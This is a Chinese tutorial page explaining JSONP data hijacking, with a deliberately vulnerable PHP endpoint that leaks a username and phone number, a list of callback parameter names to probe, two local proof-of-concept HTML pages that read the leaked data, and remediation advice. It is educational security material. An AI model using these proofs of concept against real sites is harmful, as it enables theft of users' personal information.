位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • oppok9s是什么处理器(oppok9s手机怎么样好不好)

    oppok9s是什么处理器(oppok9s手机怎么样好不好)

  • qq空间视频一直转码怎么办(qq空间视频一直显示转码中怎么删除)

    qq空间视频一直转码怎么办(qq空间视频一直显示转码中怎么删除)

  • 5000毫安电池的手机有哪些(5000毫安电池的手机哪款最好)

    5000毫安电池的手机有哪些(5000毫安电池的手机哪款最好)

  • 如何查通话记录详单(移动手机如何查通话记录)

    如何查通话记录详单(移动手机如何查通话记录)

  • 华为p30悬浮球怎么关闭(华为p30悬浮球怎么设置功能)

    华为p30悬浮球怎么关闭(华为p30悬浮球怎么设置功能)

  • 音响充不进去电是什么原因(收款音响充不进去电)

    音响充不进去电是什么原因(收款音响充不进去电)

  • 6s开不了机充电没反应(iphone6sp充电开不了机)

    6s开不了机充电没反应(iphone6sp充电开不了机)

  • ahsprotector是什么(ahplus是什么意思)

    ahsprotector是什么(ahplus是什么意思)

  • 苹果11能装两个电信卡吗(苹果11能装两个联通卡吗)

    苹果11能装两个电信卡吗(苹果11能装两个联通卡吗)

  • u盘安装win10缺少驱动(u盘安装win10缺少介质)

    u盘安装win10缺少驱动(u盘安装win10缺少介质)

  • ipad5能不能用pencil(ipad5能不能用笔)

    ipad5能不能用pencil(ipad5能不能用笔)

  • 三次方cubed是什么系统(三次方cubed是干什么的)

    三次方cubed是什么系统(三次方cubed是干什么的)

  • iphonex尺寸(iphonex尺寸长宽厘米)

    iphonex尺寸(iphonex尺寸长宽厘米)

  • 如何关闭青少年模式显示(如何关闭青少年模式oppo)

    如何关闭青少年模式显示(如何关闭青少年模式oppo)

  • 苹果6s怎么进入nfc功能(苹果6s怎么进入nfc功能门禁)

    苹果6s怎么进入nfc功能(苹果6s怎么进入nfc功能门禁)

  • 快手加入粉丝团怎样取消(快手加入粉丝团后看不到群聊)

    快手加入粉丝团怎样取消(快手加入粉丝团后看不到群聊)

  • 苹果怎么截屏截图(苹果怎么截屏截长图微信)

    苹果怎么截屏截图(苹果怎么截屏截长图微信)

  • 电脑怎么下ps软件(电脑怎么下载ps的软件)

    电脑怎么下ps软件(电脑怎么下载ps的软件)

  • gem-703l是什么型号(gem703l是什么手机)

    gem-703l是什么型号(gem703l是什么手机)

  • qq音乐如何收藏专辑(qq音乐如何收藏别人的歌单)

    qq音乐如何收藏专辑(qq音乐如何收藏别人的歌单)

  • 腾讯视频保存的图片在哪(腾讯视频保存的视频怎么到手机相册)

    腾讯视频保存的图片在哪(腾讯视频保存的视频怎么到手机相册)

  • 苹果手机电话簿怎么复制到卡里面(苹果手机电话簿怎么看不到联系人了)

    苹果手机电话簿怎么复制到卡里面(苹果手机电话簿怎么看不到联系人了)

  • Windows11值得升级吗 手把手教你升级win11(win11有什么升级)

    Windows11值得升级吗 手把手教你升级win11(win11有什么升级)

  • 【步骤详解】Docker一键部署微服务详细教程(详细步骤怎么写)

    【步骤详解】Docker一键部署微服务详细教程(详细步骤怎么写)

  • 缴纳个人所得税还算应届毕业生吗
  • 会费收入增值税申报
  • 产品含税价格加10个点不含税扣掉8个点合理吗
  • 财务软件属于哪种软件
  • 城镇土地使用税的征税范围有哪些
  • 员工在外出差的说说
  • 资产管理公司的使命
  • 现金日记账1月怎么算
  • 税务局财务报表报送期限
  • 土地置换账务处理流程
  • 预交土地增值税怎么计算公式
  • 费用和利润的比例
  • 增值税留抵退税政策2022
  • 职工宿舍楼日常管理制度
  • 房屋评估价格是否含增值税
  • 收就业局稳岗补贴做账
  • 建筑业异地预交税款怎么入库
  • 新成立公司没有财务报表情况说明
  • 小规模代扣代缴个税会计分录
  • 国外汇款 用什么理由
  • 投资收益率如何确定
  • 个人转让无形资产增值税税率
  • 试营业生产的样品怎么做账?
  • 付尾款会没货吗
  • 公司年终分红如何入账
  • 酒店试菜费用会计分录
  • win11任务栏没有输入法图标
  • 管理费用如何分摊到产品成本
  • debian10.9安装教程
  • 航天信息服务费发票哪里打印
  • 增值税的优惠有哪三种形式
  • 公司购置办公楼自用
  • 应交税费为负数什么原因
  • 芬兰东部的国家有哪些
  • 高新技术企业研发费用占比要求
  • 总分类账的登记依据和方法取决于企业所采用的
  • php获取post请求参数
  • 后端怎么返回数据给前端
  • uniapp和vue混合开发
  • ai线型工具介绍
  • 售后租回交易的第二年利息怎么算
  • 当月银行账可以下个月做吗
  • 帝国cms功能
  • vue移动组件
  • 帝国cms视频教程
  • Linux sqlite3 基本命令
  • 自然人独资公司可以变更法人吗
  • 订单不足停工
  • mysql的服务器
  • 电子承兑转出需要授权吗
  • 工会会员缴纳的医疗互助金列工会什么科目
  • 长期待摊费用如何评估
  • 预付款在会计里属于什么
  • 融资租赁咨询服务合同
  • 加班打车费用计入什么科目
  • 呆滞原材料变卖的会计处理
  • 进项税可以跨年结转吗
  • 加油费用属于什么科目明细
  • 期初调整分录
  • 公司自建房要交房产税吗
  • 小规模纳税人开专票税率是多少?
  • 预期信用损失影响损益吗
  • 挂靠建筑公司预交的增值税如何做凭证?
  • 营改增租赁服务有哪些
  • 记账报税属于会计什么职位
  • sql语句实现分页
  • sqlserver索引类型区别
  • windows2003文件服务器
  • linux磁盘分区表
  • jquery window
  • Node.js中的construct构造函数
  • 如何实现左侧固定,右侧自适应的布局
  • cacls命令怎么运用
  • (转)Unity3D NGUI在UI上显示3D模型
  • &&在js中
  • js调用css动画
  • 如何开发一个新的向量库
  • android drawpath
  • 税务局通知自查该怎么办理
  • 停车场收费需要什么手续
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设